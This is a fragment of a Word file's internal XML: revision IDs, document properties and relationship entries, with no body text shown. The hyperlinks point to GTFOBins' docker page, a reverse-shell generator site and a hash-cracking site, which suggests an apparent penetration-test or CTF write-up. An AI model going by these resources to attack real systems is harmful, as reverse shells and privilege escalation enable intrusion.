    <w:rsid w:val="00B777C8"/>
    <w:rsid w:val="00B832A5"/>
    <w:rsid w:val="00B92FB2"/>
    <w:rsid w:val="00B95324"/>
    <w:rsid w:val="00BB26F2"/>
    <w:rsid w:val="00BB5756"/>
    <w:rsid w:val="00BC207C"/>
    <w:rsid w:val="00BC3B8A"/>
    <w:rsid w:val="00BC5AFF"/>
    <w:rsid w:val="00BD0D73"/>
    <w:rsid w:val="00BD55CB"/>
    <w:rsid w:val="00BD6EE7"/>
    <w:rsid w:val="00BE31A0"/>
    <w:rsid w:val="00BF73AE"/>
    <w:rsid w:val="00C00CB9"/>
    <w:rsid w:val="00C01D75"/>
    <w:rsid w:val="00C03381"/>
    <w:rsid w:val="00C06028"/>
    <w:rsid w:val="00C07A4E"/>
    <w:rsid w:val="00C11D4E"/>
    <w:rsid w:val="00C123FA"/>
    <w:rsid w:val="00C21014"/>
    <w:rsid w:val="00C25937"/>
    <w:rsid w:val="00C276A5"/>
    <w:rsid w:val="00C34778"/>
    <w:rsid w:val="00C35125"/>
    <w:rsid w:val="00C45CB2"/>
    <w:rsid w:val="00C52A5E"/>
    <w:rsid w:val="00C53619"/>
    <w:rsid w:val="00C568BD"/>
    <w:rsid w:val="00C6238D"/>
    <w:rsid w:val="00C633ED"/>
    <w:rsid w:val="00C777F2"/>
    <w:rsid w:val="00C81817"/>
    <w:rsid w:val="00C81D56"/>
    <w:rsid w:val="00C81F2E"/>
    <w:rsid w:val="00C850E6"/>
    <w:rsid w:val="00C9386F"/>
    <w:rsid w:val="00C93CAB"/>
    <w:rsid w:val="00CB2C8B"/>
    <w:rsid w:val="00CB59B7"/>
    <w:rsid w:val="00CC6DD4"/>
    <w:rsid w:val="00CD2558"/>
    <w:rsid w:val="00CD515A"/>
    <w:rsid w:val="00CD67B9"/>
    <w:rsid w:val="00CD6A85"/>
    <w:rsid w:val="00CE058D"/>
    <w:rsid w:val="00CE12FD"/>
    <w:rsid w:val="00CE281D"/>
    <w:rsid w:val="00CE7A9B"/>
    <w:rsid w:val="00CF096A"/>
    <w:rsid w:val="00CF19EC"/>
    <w:rsid w:val="00CF2473"/>
    <w:rsid w:val="00CF3AE4"/>
    <w:rsid w:val="00D00329"/>
    <w:rsid w:val="00D04955"/>
    <w:rsid w:val="00D06680"/>
    <w:rsid w:val="00D0797D"/>
    <w:rsid w:val="00D133BF"/>
    <w:rsid w:val="00D14693"/>
    <w:rsid w:val="00D16B14"/>
    <w:rsid w:val="00D17497"/>
    <w:rsid w:val="00D23AAA"/>
    <w:rsid w:val="00D23F9A"/>
    <w:rsid w:val="00D32365"/>
    <w:rsid w:val="00D32D82"/>
    <w:rsid w:val="00D33277"/>
    <w:rsid w:val="00D37617"/>
    <w:rsid w:val="00D3789D"/>
    <w:rsid w:val="00D37C23"/>
    <w:rsid w:val="00D46B43"/>
    <w:rsid w:val="00D4702E"/>
    <w:rsid w:val="00D53DC2"/>
    <w:rsid w:val="00D60B3C"/>
    <w:rsid w:val="00D62644"/>
    <w:rsid w:val="00D63425"/>
    <w:rsid w:val="00D71DD8"/>
    <w:rsid w:val="00D808A0"/>
    <w:rsid w:val="00D8499D"/>
    <w:rsid w:val="00D95860"/>
    <w:rsid w:val="00DA1BE0"/>
    <w:rsid w:val="00DA49E1"/>
    <w:rsid w:val="00DB3F07"/>
    <w:rsid w:val="00DB494C"/>
    <w:rsid w:val="00DD03D5"/>
    <w:rsid w:val="00DD2943"/>
    <w:rsid w:val="00DD7236"/>
    <w:rsid w:val="00DE3854"/>
    <w:rsid w:val="00DE700C"/>
    <w:rsid w:val="00DF0253"/>
    <w:rsid w:val="00DF5081"/>
    <w:rsid w:val="00E03991"/>
    <w:rsid w:val="00E0445A"/>
    <w:rsid w:val="00E05F56"/>
    <w:rsid w:val="00E06757"/>
    <w:rsid w:val="00E1511F"/>
    <w:rsid w:val="00E157FA"/>
    <w:rsid w:val="00E3103A"/>
    <w:rsid w:val="00E32095"/>
    <w:rsid w:val="00E41F8C"/>
    <w:rsid w:val="00E60702"/>
    <w:rsid w:val="00E652DA"/>
    <w:rsid w:val="00E65ACD"/>
    <w:rsid w:val="00E708F4"/>
    <w:rsid w:val="00E74869"/>
    <w:rsid w:val="00E80837"/>
    <w:rsid w:val="00E813D9"/>
    <w:rsid w:val="00E83405"/>
    <w:rsid w:val="00E879D1"/>
    <w:rsid w:val="00E93BFE"/>
    <w:rsid w:val="00EA5629"/>
    <w:rsid w:val="00EA5C73"/>
    <w:rsid w:val="00EB01AE"/>
    <w:rsid w:val="00EB209F"/>
    <w:rsid w:val="00EB49C7"/>
    <w:rsid w:val="00EC0B70"/>
    <w:rsid w:val="00EC19B9"/>
    <w:rsid w:val="00EC24BC"/>
    <w:rsid w:val="00EC24C8"/>
    <w:rsid w:val="00ED30D9"/>
    <w:rsid w:val="00ED4B0B"/>
    <w:rsid w:val="00ED5AFF"/>
    <w:rsid w:val="00EE3928"/>
    <w:rsid w:val="00EE4BF5"/>
    <w:rsid w:val="00EF3F2E"/>
    <w:rsid w:val="00EF4D48"/>
    <w:rsid w:val="00EF6C58"/>
    <w:rsid w:val="00F032B7"/>
    <w:rsid w:val="00F07A71"/>
    <w:rsid w:val="00F127BA"/>
    <w:rsid w:val="00F14FBA"/>
    <w:rsid w:val="00F1788D"/>
    <w:rsid w:val="00F2367A"/>
    <w:rsid w:val="00F24A40"/>
    <w:rsid w:val="00F2686F"/>
    <w:rsid w:val="00F32951"/>
    <w:rsid w:val="00F33F3E"/>
    <w:rsid w:val="00F3598A"/>
    <w:rsid w:val="00F43053"/>
    <w:rsid w:val="00F43890"/>
    <w:rsid w:val="00F54455"/>
    <w:rsid w:val="00F54FAF"/>
    <w:rsid w:val="00F57770"/>
    <w:rsid w:val="00F57F51"/>
    <w:rsid w:val="00F57FEB"/>
    <w:rsid w:val="00F72D42"/>
    <w:rsid w:val="00F763BE"/>
    <w:rsid w:val="00F83570"/>
    <w:rsid w:val="00F83F4B"/>
    <w:rsid w:val="00F84BB9"/>
    <w:rsid w:val="00F84DF8"/>
    <w:rsid w:val="00F85170"/>
    <w:rsid w:val="00F859B9"/>
    <w:rsid w:val="00FA7DB1"/>
    <w:rsid w:val="00FB0051"/>
    <w:rsid w:val="00FC164F"/>
    <w:rsid w:val="00FD1A70"/>
    <w:rsid w:val="00FD29AC"/>
    <w:rsid w:val="00FD3DB3"/>
    <w:rsid w:val="00FD3FC3"/>
    <w:rsid w:val="00FD5C36"/>
    <w:rsid w:val="00FE2BB9"/>
    <w:rsid w:val="00FE3451"/>
    <w:rsid w:val="00FE4149"/>
    <w:rsid w:val="00FF1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8600F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7F3A5129-C049-4968-A71C-F901E1E21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32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32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2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2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2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2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2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2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2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E32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4E32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E32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E324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E324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E324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E324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E324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E324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2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E32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2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E32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2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E32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2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2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2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E32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2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1963B3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963B3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2550D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yperlink" Target="https://gtfobins.org/gtfobins/docker/" TargetMode="External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revshells.com/" TargetMode="External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49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s://crackstation.net/" TargetMode="External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15</Pages>
  <Words>997</Words>
  <Characters>5688</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>47</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6672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2850</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-18T11:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-25T17:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>